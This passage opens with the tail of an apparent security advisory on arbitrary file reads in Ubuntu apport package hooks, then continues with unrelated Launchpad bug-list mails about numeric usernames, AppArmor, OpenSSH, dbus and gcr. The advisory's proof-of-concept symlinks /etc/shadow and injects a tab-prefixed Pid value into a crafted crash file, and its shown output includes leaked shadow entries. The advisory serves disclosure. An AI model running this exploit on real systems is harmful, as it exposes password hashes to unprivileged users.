(si_units(max_length),
si_units(sys.getsizeof(content)))
report['Tags'] += ' openjdk-hs-err'
```
By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
`0`, the function includes an arbitrary file by following a potential
symbolic link `/home/user/hs_err_pid0.log`.
### PoC
```
$ sudo apt install openjdk-14-jdk
$ sudo sysctl fs.protected_symlinks
fs.protected_symlinks = 1
$ ln -s /etc/shadow /home/user/hs_err_pid0.log
$ pid=$'\t0';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: openjdk-lts 123
SourcePackage: openjdk-lts
ProcCwd: /home/user
ProcStatus:
Pid:$pid
Uid:$pid
EOF
$ grep -A3 root: /var/crash/poc.crash
root:!:18393:0:9:7:::
daemon:*:18375:0:9:7:::
bin:*:18375:0:9:7:::
sys:*:18375:0:9:7:::
```
## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
The root cause of this issue stems from the fact, that a potentially
user-controlled file in the `/tmp` directory is not checked for being a
symbolic link and therefore might allow including arbitrary files in the
processed crash report:
Note: Requires `fs.protected_symlinks=0`
```Python
def attach_3d_info(report, ui=None):
...
# Compiz internal state if compiz crashed
if True or report.get('SourcePackage','Unknown') == "compiz" and
"ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
attach_file_if_exists(report, compiz_state_file,
"compiz_internal_states")
```
### PoC
```
$ sudo sysctl fs.protected_symlinks=0
fs.protected_symlinks = 0
$ ln -s /etc/shadow /tmp/compiz_internal_state0
$ cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
Proc
Re: [Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names
On Wed, Jun 16, 2021 at 09:15:32PM -, Steve Langasek wrote: > Disallowing leading numeric digits entirely would, unfortunately, > disable a significant class of valid usernames in conflict with > historical usage. Admins are still able to hand-edit /etc/passwd, /etc/shadow, and mv home directory names if they've got a good enough reason to use such names and trust their software to do the right thing. > The main motivation in fixing this is that allowing fully-numeric > usernames means there is ambiguity in contexts that can reference both > uids and usernames and do not have strong typing. Aside from systemd, > this is mostly about shells and invocations of various commandline > tools; and neither bash nor the tools appear to interpret 0o0 or 0x0 as > numbers: I was thinking primarily of perl, here: $ sudo perl -e 'print "muahaa\n" if $< == "0x0";' muahaa You could argue that wherever "0x0" came from in this perl program should have kept track if it received a number or a name, but the language sure doesn't help. C examples are less compelling because it has types but the atoi(3) and strtoul(3) APIs make it very easy to parse something like "2build" or "4fun" or "0x0" into an integer. (strtol(3) has a nice example.) > Let's please focus on the known problem case of all-numeric usernames. > If there are other confirmed security issues with octal/hex > representations of numbers, then we should also close those, but it > needs a more precise fix than disabling leading digits. How strongly do you feel about this? I can see where you're coming from, but given (a) the escape hatch mechanism to 'break the rules' isn't too onerous (b) the ease with which brittle code can be written (c) the simplicity of 'deny leading digit' compared against 'make sure there's at least one non-digit' or 'make sure there's at least one letter' etc I prefer the simpler rule. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1927078 Title: Don't allow useradd to use fully numeric names Status in shadow package in Ubuntu: New Status in shadow source package in Focal: New Status in shadow source package in Groovy: New Status in shadow source package in Hirsute: New Status in shadow source package in Impish: New Bug description: [Description] Fully numeric names support in Ubuntu is inconsistent in Focal onwards because systemd does not like them[1] but are still allowed by default by useradd, leaving the session behavior in hands of the running applications. Two examples: 1. After creating a user named "0", the user can log in via ssh or console but loginctl won't create a session for it: root@focal:/home/ubuntu# useradd -m 0 root@focal:/home/ubuntu# id 0 uid=1005(0) gid=1005(0) groups=1005(0) .. 0@192.168.122.6's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64) Last login: Thu Apr 8 16:17:06 2021 from 192.168.122.1 $ loginctl No sessions. $ w 16:20:09 up 4 min, 1 user, load average: 0.03, 0.14, 0.08 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 0pts/0192.168.122.116:170.00s 0.00s 0.00s w And pam-systemd shows the following message: Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for user 0 by (uid=0) Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd initializing Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get user record: Invalid argument 2. With that same username, every successful authentication in gdm will loop back to gdm again instead of starting gnome, making the user unable to login. Making useradd fail (unless --badnames is set) when a fully numeric name is used will make the default OS behavior consistent. [Other info] - Upstream does not support fully numeric usernames - useradd has a --badnames parameter that would still allow the use of these type of names To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names
Heh, a comment in Jawn's debdiff: * User/group names must match [a-z_][a-z0-9_-]*[$] I found period also worked fine: root@u20:~# useradd 0.0 root@u20:~# getent passwd 0.0 0.0:x:1001:1001::/home/0.0:/bin/sh root@u20:~# userdel 0.0 root@u20:~# getent passwd 0.0 root@u20:~# exit I know comments are almost always out of date by the time I read them, but this one seems wronger than usual. :) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1927078 Title: Don't allow useradd to use fully numeric names Status in shadow package in Ubuntu: New Status in shadow source package in Focal: New Status in shadow source package in Groovy: New Status in shadow source package in Hirsute: New Status in shadow source package in Impish: New Bug description: [Description] Fully numeric names support in Ubuntu is inconsistent in Focal onwards because systemd does not like them[1] but are still allowed by default by useradd, leaving the session behavior in hands of the running applications. Two examples: 1. After creating a user named "0", the user can log in via ssh or console but loginctl won't create a session for it: root@focal:/home/ubuntu# useradd -m 0 root@focal:/home/ubuntu# id 0 uid=1005(0) gid=1005(0) groups=1005(0) .. 0@192.168.122.6's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64) Last login: Thu Apr 8 16:17:06 2021 from 192.168.122.1 $ loginctl No sessions. $ w 16:20:09 up 4 min, 1 user, load average: 0.03, 0.14, 0.08 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 0pts/0192.168.122.116:170.00s 0.00s 0.00s w And pam-systemd shows the following message: Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for user 0 by (uid=0) Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd initializing Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get user record: Invalid argument 2. With that same username, every successful authentication in gdm will loop back to gdm again instead of starting gnome, making the user unable to login. Making useradd fail (unless --badnames is set) when a fully numeric name is used will make the default OS behavior consistent. [Other info] - Upstream does not support fully numeric usernames - useradd has a --badnames parameter that would still allow the use of these type of names To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1932342] Re: Feature Request: Rate limit apparmor denial logs
See also https://github.com/snapcrafters/discord/issues/23 -- there may be some other advice buried in there on how to deal with the deluge while also not giving discord permission to see all the processes you're running. Thanks ** Bug watch added: github.com/snapcrafters/discord/issues #23 https://github.com/snapcrafters/discord/issues/23 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1932342 Title: Feature Request: Rate limit apparmor denial logs Status in apparmor package in Ubuntu: Confirmed Bug description: While running Discord, AppArmor prints a ton of denials every second. The lines look something like this: > Jun 17 18:00:14 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" I'm thankful that AppArmor is preventing it from using pthread to mess with my system. However, I wish it didn't spam my logs so much. Would it be possible to implement a system whereby subsequent identical logs within the same second are deduplicated? For example, instead of 127 separate denials lines, one second could look like this: > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/1383/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [3 identical messages omitted] > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/1407/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [48 identical messages omitted] > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="snap.snap-store.ubuntu-software" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [15 identical messages omitted] > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="docker-default" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/14296/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [8 identical messages omitted] > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/93917/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined" > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [40 identical messages omitted] Of course, it would've been nice if Discord wasn't persistently trying to ptrace everything on my system all the time even after being denied, but AppArmor exists to deal with misbehaving applications, so we kinda have to expect that the applications it deals with will be misbehaving. ProblemType: Bug DistroRelease: Ubuntu 21.04 Package: apparmor 3.0.0-0ubuntu7 ProcVersionSignature: Ubuntu 5.11.0-18.19-generic 5.11.17 Uname: Linux 5.11.0-18-generic x86_64 NonfreeKernelModu
[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names
Ah, that explains that. Would you mind adding tests for a few more usernames? 0root 0 00 0.0 0x0 0-0 0_0 0.o 0xo 0-o 0_o Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1927078 Title: Don't allow useradd to use fully numeric names Status in shadow package in Ubuntu: New Status in shadow source package in Focal: New Status in shadow source package in Groovy: New Status in shadow source package in Hirsute: New Status in shadow source package in Impish: New Bug description: [Description] Fully numeric names support in Ubuntu is inconsistent in Focal onwards because systemd does not like them[1] but are still allowed by default by useradd, leaving the session behavior in hands of the running applications. Two examples: 1. After creating a user named "0", the user can log in via ssh or console but loginctl won't create a session for it: root@focal:/home/ubuntu# useradd -m 0 root@focal:/home/ubuntu# id 0 uid=1005(0) gid=1005(0) groups=1005(0) .. 0@192.168.122.6's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64) Last login: Thu Apr 8 16:17:06 2021 from 192.168.122.1 $ loginctl No sessions. $ w 16:20:09 up 4 min, 1 user, load average: 0.03, 0.14, 0.08 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 0pts/0192.168.122.116:170.00s 0.00s 0.00s w And pam-systemd shows the following message: Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for user 0 by (uid=0) Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd initializing Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get user record: Invalid argument 2. With that same username, every successful authentication in gdm will loop back to gdm again instead of starting gnome, making the user unable to login. Making useradd fail (unless --badnames is set) when a fully numeric name is used will make the default OS behavior consistent. [Other info] - Upstream does not support fully numeric usernames - useradd has a --badnames parameter that would still allow the use of these type of names To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1885990] Re: server: Match has no effect in include file (upstream 3122)
I can't speak for the SRU team, but it's entirely possible that if you prepare and test a debdiff, and show that this can be fixed, you could drive an SRU through to completion; see https://wiki.ubuntu.com/StableReleaseUpdates for more information. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1885990 Title: server: Match has no effect in include file (upstream 3122) Status in portable OpenSSH: Unknown Status in openssh package in Ubuntu: Fix Released Bug description: Hello Ubuntu version: focal 20.04 LTS Version: openssh-server: Installed: 1:8.2p1-4ubuntu0.1 Candidate: 1:8.2p1-4ubuntu0.1 Expected: match statement in included files work as documented in the fine manual What happens: the statements are ignored. If you add Match statements in an included file, it will generate no error but have no effect. The exact same statements work in the main server config file (/etc/ssh/sshd_config) this is to track upstream bug 3122: https://bugzilla.mindrot.org/show_bug.cgi?id=3122 it's fixed but will only be in 8.4 so it affects Ubuntu 20.04 LTS where openssh is at 8.2. I'm not *absolutely* whining for a backport since include files is a new feature for openssl in focal so it's not a regression. Would be nice though :), because include files are standard for any server software in Linux since at least a decade... To manage notifications about this bug go to: https://bugs.launchpad.net/openssh/+bug/1885990/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1965857] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to software-properties in Ubuntu. https://bugs.launchpad.net/bugs/1965857 Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages' Status in software-properties package in Ubuntu: New Bug description: live patch not active ProblemType: Crash DistroRelease: Ubuntu 22.04 Package: software-properties-gtk 0.99.19 ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27 Uname: Linux 5.15.0-23-generic x86_64 ApportVersion: 2.20.11-0ubuntu79 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Tue Mar 22 10:22:47 2022 ExecutablePath: /usr/bin/software-properties-gtk InstallationDate: Installed on 2020-04-25 (695 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) InterpreterPath: /usr/bin/python3.10 PackageArchitecture: all ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab=6 ProcEnviron: LANGUAGE=en_IN:en PATH=(custom, user) XDG_RUNTIME_DIR= LANG=en_IN SHELL=/bin/bash Python3Details: /usr/bin/python3.10, Python 3.10.3, python3-minimal, 3.10.1-0ubuntu2 PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab=6'] PythonDetails: N/A SourcePackage: software-properties Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages' UpgradeStatus: Upgraded to jammy on 2022-02-12 (37 days ago) UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1965857/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1965661] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to software-properties in Ubuntu. https://bugs.launchpad.net/bugs/1965661 Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages' Status in software-properties package in Ubuntu: New Bug description: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages' ProblemType: Crash DistroRelease: Ubuntu 22.04 Package: software-properties-gtk 0.99.19 ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27 Uname: Linux 5.15.0-23-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu79 Architecture: amd64 CasperMD5CheckResult: pass CrashCounter: 1 CurrentDesktop: ubuntu:GNOME Date: Sun Mar 20 03:33:53 2022 ExecutablePath: /usr/bin/software-properties-gtk InstallationDate: Installed on 2022-03-20 (0 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220319) InterpreterPath: /usr/bin/python3.10 PackageArchitecture: all ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab 2 ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash Python3Details: /usr/bin/python3.10, Python 3.10.2+, python3-minimal, 3.10.1-0ubuntu2 PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab', '2'] PythonDetails: N/A SourcePackage: software-properties Title: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages' UpgradeStatus: No upgrade log present (probably fresh install) UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1965661/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968047] Re: Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and 3.3.3 problem with the openssl-dev package
Hopefully this is helpful for you: https://sources.debian.org/data/main/r/ruby3.0/3.0.3-1/debian/patches/Update- openssl-to-version-3.0.0.patch Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1968047 Title: Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and 3.3.3 problem with the openssl-dev package Status in openssl package in Ubuntu: New Bug description: This problem only exists in Ununto 22.04 beta When attempting to comple ruby (any version - I have tried 2.7.5, 3.0.3 & 3.1.1) it fails becuase of a problem with the libssl-dev package. The previous version of Ubuntu used version 1.1.1. The new version uses openssl-dev/libssl-dev 3.0.2 $ lsb_release -rd Description:Ubuntu Jammy Jellyfish (development branch) Release:22.04 sudo apt-cache policy libssl-dev libssl-dev: Installed: 3.0.2-0ubuntu1 Candidate: 3.0.2-0ubuntu1 Version table: *** 3.0.2-0ubuntu1 500 500 http://au.archive.ubuntu.com/ubuntu jammy/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1968047/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968305] Re: sshd_config.d overrides not working
This reminds me of several previous bugs; this may or may not be a duplicate, and this may or may not be intentional behaviour. Hopefully these are are useful and save some debugging effort: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1922212 https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1876320 https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1873528 Especially 1873528 feels like most likely to be relevant, I suggesting reading that one first. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1968305 Title: sshd_config.d overrides not working Status in openssh package in Ubuntu: New Bug description: Creating an sshd_config override file under /etc/ssh/sshd_config.d/ does not override settings from /etc/ssh/sshd_config From debugging sshd, I can see the override file is indeed being read, and the option is supposedly set. But after testing, the options are not taking effect. Specifically, in the main sshd_config, I have disabled PasswordAuthentication In my override file, PasswordAuthentication is enabled Yet, when connecting to the server, it only checks public/private keys. This is for an environment where we have our default sshd_config, and in specific use-cases, we might enable PasswordAuthentication for some servers. ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: openssh-server 1:8.2p1-4ubuntu0.4 ProcVersionSignature: Ubuntu 5.13.0-39.44~20.04.1-generic 5.13.19 Uname: Linux 5.13.0-39-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.21 Architecture: amd64 CasperMD5CheckResult: pass Date: Fri Apr 8 10:37:42 2022 InstallationDate: Installed on 2021-11-04 (154 days ago) InstallationMedia: Ubuntu-Server 20.04.3 LTS "Focal Fossa" - Release amd64 (20210824) SourcePackage: openssh UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1968305/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot
Yikes, does it actually *stop* at that point? That's .. not ideal. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1968845 Title: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot Status in dbus package in Ubuntu: New Bug description: Upgrading on a virtual machine from 20.04 to 22.04. I have had this happen twice now, I got one upgrade done without this bug. Basically the package installation stops at dbus package asking for a reboot as it was unable to upgrade as dbus-daemon was running. And rebooting at this stage obviously will cause a non-functioning system. Added a screenshot of the upgrade window. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot
Here's the postinst I've got for that package. Maybe the
reload_dbus_config() could use a --reply-timeout=5000 or something?
Thanks
$ cat /fst/trees/ubuntu/main/d/dbus/dbus_1.12.20-2ubuntu4/debian/dbus.postinst
#!/bin/sh
# Copyright © 2003 Colin Walters
# Copyright © 2006 Sjoerd Simons
set -e
MESSAGEUSER=messagebus
MESSAGEHOME=/var/run/dbus
LAUNCHER=/usr/lib/dbus-1.0/dbus-daemon-launch-helper
# This is what the init script would do, but it's simpler (and less
# dependent on sysvinit vs. Upstart vs. etc.) if we do it directly.
reload_dbus_config() {
[ -S /var/run/dbus/system_bus_socket ] || return 0
dbus-send --print-reply --system --type=method_call \
--dest=org.freedesktop.DBus \
/ org.freedesktop.DBus.ReloadConfig > /dev/null || true
}
if [ "$1" = triggered ]; then
reload_dbus_config
exit 0
fi
if [ "$1" = configure ]; then
adduser --system \
--quiet \
--home /nonexistent \
--no-create-home \
--disabled-password \
--group "$MESSAGEUSER"
if ! dpkg-statoverride --list "$LAUNCHER" >/dev/null; then
dpkg-statoverride --update --add root "$MESSAGEUSER" 4754 "$LAUNCHER"
fi
# This is idempotent, so it's OK to do every time. The system bus' init
# script does this anyway, but you also have to do this before a session
# bus will work, so we do this here for the benefit of people starting
# a temporary session bus in a chroot
dbus-uuidgen --ensure
fi
if [ "$1" = configure ] && [ -n "$2" ]; then
# On upgrades, we only reload config, and don't restart (restarting the
# system bus is not supported by upstream). The code added by
# dh_installinit -r creates a start action, below.
# Recommend a reboot if there is a dbus-daemon running in the same root
# as us. Deliberately not using anything init-related here, to be
# init-agnostic: if we get a false positive (at least one dbus-daemon
# is running but it isn't the system bus) that isn't the end of the
# world, because it's probably a session bus, so the user needs to
# log out and back in anyway.
#
# Debian has /usr/bin/dbus-daemon, Ubuntu has /bin/dbus-daemon.
# Look for both.
if pidof -c /bin/dbus-daemon /usr/bin/dbus-daemon >/dev/null; then
echo "A reboot is required to replace the running dbus-daemon." >&2
echo "Please reboot the system when convenient." >&2
# trigger an update notification that recommends a reboot
# (used by unattended-upgrades etc.)
touch /var/run/reboot-required || true
if ! grep -Fqsx dbus /run/reboot-required.pkgs; then
echo dbus >> /run/reboot-required.pkgs || true
fi
# same thing for the older update-notifier interface
[ -x /usr/share/update-notifier/notify-reboot-required ] && \
/usr/share/update-notifier/notify-reboot-required || true
fi
# Clean up old compatibility symlinks that were used to upgrade from
# Debian 8 to Debian 9. This can be dropped after Debian 10 is released.
for bus in system session; do
conf="/etc/dbus-1/${bus}.conf"
exp_target="/usr/share/dbus-1/${bus}.conf"
target="$(readlink -f "${conf}")" || continue
if [ -h "${conf}" ] && [ "_${target}" = "_${exp_target}" ]; then
rm -f "${conf}"
fi
done
fi
#DEBHELPER#
# Do this after the debhelper-generated bits so that dpkg-maintscript-helper
# will have finished moving configuration files around. We only need to do
# this for upgrades, not new installations.
if [ "$1" = configure ] && [ -n "$2" ]; then
reload_dbus_config
fi
# We don't start dbus.service in postinst, so ensure dbus.socket is running
if [ "$1" = configure ] && [ -d /run/systemd/system ]; then
systemctl try-restart sockets.target || true
fi
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1968845
Title:
Upgrade to 22.04 from 20.04 ends with dbus installation asking for a
reboot
Status in dbus package in Ubuntu:
New
Bug description:
Upgrading on a virtual machine from 20.04 to 22.04. I have had this
happen twice now, I got one upgrade done without this bug.
Basically the package installation stops at dbus package asking for a
reboot as it was unable to upgrade as dbus-daemon was running. And
rebooting at this stage obviously will cause a non-functioning system.
Added a screenshot of the upgrade window.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1969118] Re: Certificate viewer shows extra bytes for RSA keys
Hello Mikko, thanks for the report; I believe that's working as intended, those bytes are part of the DER encoding; there's an excellent answer at https://crypto.stackexchange.com/a/19982/1400 that describes the meanings of each of those bytes. Thanks ** Information type changed from Private Security to Public Security ** Changed in: gcr (Ubuntu) Status: New => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gcr in Ubuntu. https://bugs.launchpad.net/bugs/1969118 Title: Certificate viewer shows extra bytes for RSA keys Status in gcr package in Ubuntu: Invalid Bug description: When I view a x509 certificate using gcr-viewer .../path/to/certificate.pem and open the "Details" section and check the RSA public key information, the section that lists the public key renders extra 8 bytes at the start and 5 bytes at the end which are not actually part of the key. I haven't tried if this happens with other file types except x509, or with encryption methods except RSA. The exact certificate I viewed can be downloaded from https://crt.sh/?d=6454583403 and the expected public key modulus should start with 00:b6:28:0b:44:... but the certificate viewer shows public key starting with bytes 30 82 01 0A 02 82 01 01 00 B6 28 0B 44. Note the extra bytes 30 82 01 0A 02 82 01 01. The extra bytes seem to be static and do not change after re-lanching the viewer again. There are also extra bytes in the end of the displayed key. I'm marking this bug as a security vulnerability for now because (1) This tool is supposed to used to check encryption credentials, and (2) It's still unknown if this is some kind of 8 byte underflow/5 byte overflow or just a rendering problem. I'm not aware of the viewer writing extra bytes to any memory location so I would assume this is just a rendering issue. I'm fine with this issue being public so feel free to publish at your discretion. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: gcr 3.28.0-1 ProcVersionSignature: Ubuntu 5.4.0-107.121~18.04.1-lowlatency 5.4.174 Uname: Linux 5.4.0-107-lowlatency x86_64 ApportVersion: 2.20.9-0ubuntu7.27 Architecture: amd64 CurrentDesktop: MATE Date: Thu Apr 14 15:47:18 2022 EcryptfsInUse: Yes InstallationDate: Installed on 2019-01-05 (1194 days ago) InstallationMedia: Ubuntu 